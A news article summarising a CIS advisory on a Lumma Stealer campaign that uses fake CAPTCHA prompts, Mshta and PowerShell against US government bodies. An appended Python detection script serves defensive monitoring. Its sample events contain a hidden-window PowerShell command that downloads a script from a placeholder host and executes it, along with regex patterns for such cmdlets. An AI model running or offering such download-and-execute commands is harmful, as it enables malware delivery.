Lumma Stealer Targets US Government: Fake CAPTCHA Attack Explained
22nd March 2025, Kathmandu
The Center for Internet Security (CIS) Cyber Threat Intelligence (CTI) team has identified a surge in Lumma Stealer malware activity targeting U.S. State, Local, Tribal, and Territorial (SLTT) government organizations.
The malware campaign employs deceptive tactics, including fake CAPTCHA verification prompts, to trick users into executing malicious PowerShell scripts, ultimately delivering the Lumma Stealer payload.
How the Attack Works
CIS analysts detected the campaign through CIS Endpoint Security Services (ESS), observing multiple instances in which SLTT victims were redirected to malicious web pages. These pages displayed fake CAPTCHA verification prompts designed to lure users into running a PowerShell script. CIS ESS flagged the activity because of the use of Mshta, a Windows utility that executes Microsoft HTML Application (HTA) files, to run malicious JavaScript that in turn launched the PowerShell script.
Once executed, the initial PowerShell script downloads and runs two additional scripts. A third PowerShell script, which contains defense-evasion techniques and an encrypted Windows binary, is then compiled on the infected system into the .NET Lumma Stealer payload.
Lumma Stealer: A Growing Threat
Lumma Stealer is an information-stealing malware written in C that first emerged on dark web forums in 2022. It is sold as a Malware-as-a-Service (MaaS) subscription by the cyber threat actor known as “Shamel” or “Lumma.” The malware is designed to steal sensitive data, including personally identifiable information (PII), credentials, and banking information.
Lumma Stealer offers various defense evasion capabilities depending on the subscription tier purchased by threat actors. These include:
Detecting virtualized environments
Monitoring user activity on the system
Encrypting its executable to deter reverse engineering
Bypassing signature detection
Utilizing polyglot files (files that are valid in multiple formats)
The malware also employs Living off the Land (LotL) techniques, such as:
DLL sideloading
Mshta
PowerShell
Process hollowing
SSH
WMI (Windows Management Instrumentation)
CIS Recommendations
The CIS CTI team urges U.S. SLTT government entities to remain vigilant against Lumma Stealer and similar information-stealing campaigns. These threats are widespread, opportunistic, and highly effective at targeting sensitive data. Organizations are advised to:
Educate users about the risks of fake CAPTCHA prompts and suspicious web pages.
Monitor for unusual PowerShell activity and Mshta executions.
Implement robust endpoint security solutions, such as CIS ESS, to detect and block malicious scripts.
Regularly update and patch systems to mitigate vulnerabilities.
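As an added illustration of the monitoring recommended above (example detection code written for this page, not part of the CIS advisory or of CIS ESS), the Python below scans process-creation events for the mshta.exe to powershell.exe parent-child chain described in the attack walkthrough and separately flags mshta.exe launched with a remote URL. The event shape, the hostnames and the command lines are constructed sample data and are assumptions of the example.

```python
import re

# Constructed sample process-creation events (fields modelled loosely on
# Sysmon Event ID 1). Hostnames are placeholders, not real indicators.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/verify.hta"},
    {"pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iwr https://example.invalid/s1.ps1 | iex"'},
    {"pid": 400, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\inventory.ps1"},
]

# Command-line traits that make a PowerShell launch more suspicious: hidden
# window, bypassed execution policy, and download-then-execute cmdlets.
SUSPICIOUS_PS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass"
    r"|\biwr\b|invoke-webrequest|downloadstring|\biex\b|invoke-expression",
    re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

def image_name(event):
    """Lower-cased file name of the process image."""
    return event["image"].rsplit("\\", 1)[-1].lower()

def mshta_with_remote_target(events):
    """PIDs of mshta.exe launched with a URL argument (remote HTA)."""
    return [e["pid"] for e in events
            if image_name(e) == "mshta.exe" and REMOTE_URL.search(e["cmdline"])]

def mshta_powershell_chains(events):
    """(mshta_pid, powershell_pid, score) for each powershell.exe whose parent
    is mshta.exe; score = 1 plus the number of suspicious command-line traits."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if image_name(e) != "powershell.exe":
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or image_name(parent) != "mshta.exe":
            continue
        hits.append((parent["pid"], e["pid"], 1 + len(SUSPICIOUS_PS.findall(e["cmdline"]))))
    return hits

if __name__ == "__main__":
    print("mshta with remote target:", mshta_with_remote_target(SAMPLE_EVENTS))
    for mshta_pid, ps_pid, score in mshta_powershell_chains(SAMPLE_EVENTS):
        print(f"ALERT mshta.exe pid {mshta_pid} -> powershell.exe pid {ps_pid}, score {score}")
```

The benign inventory script launched from explorer.exe (pid 400) is not reported, which is the point of keying on the parent process rather than on powershell.exe alone.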
Background on Lumma Stealer
Lumma Stealer has gained notoriety for its ability to evade detection and steal critical data. Its MaaS model allows even less technically skilled threat actors to deploy the malware, increasing its prevalence. The malware’s use of LotL techniques makes it particularly challenging to detect, as it leverages legitimate system tools to carry out malicious activities.
As cybercriminals continue to refine their tactics, the need for proactive defense measures and heightened awareness among SLTT organizations has never been greater.
For more: Lumma Stealer Targets US Government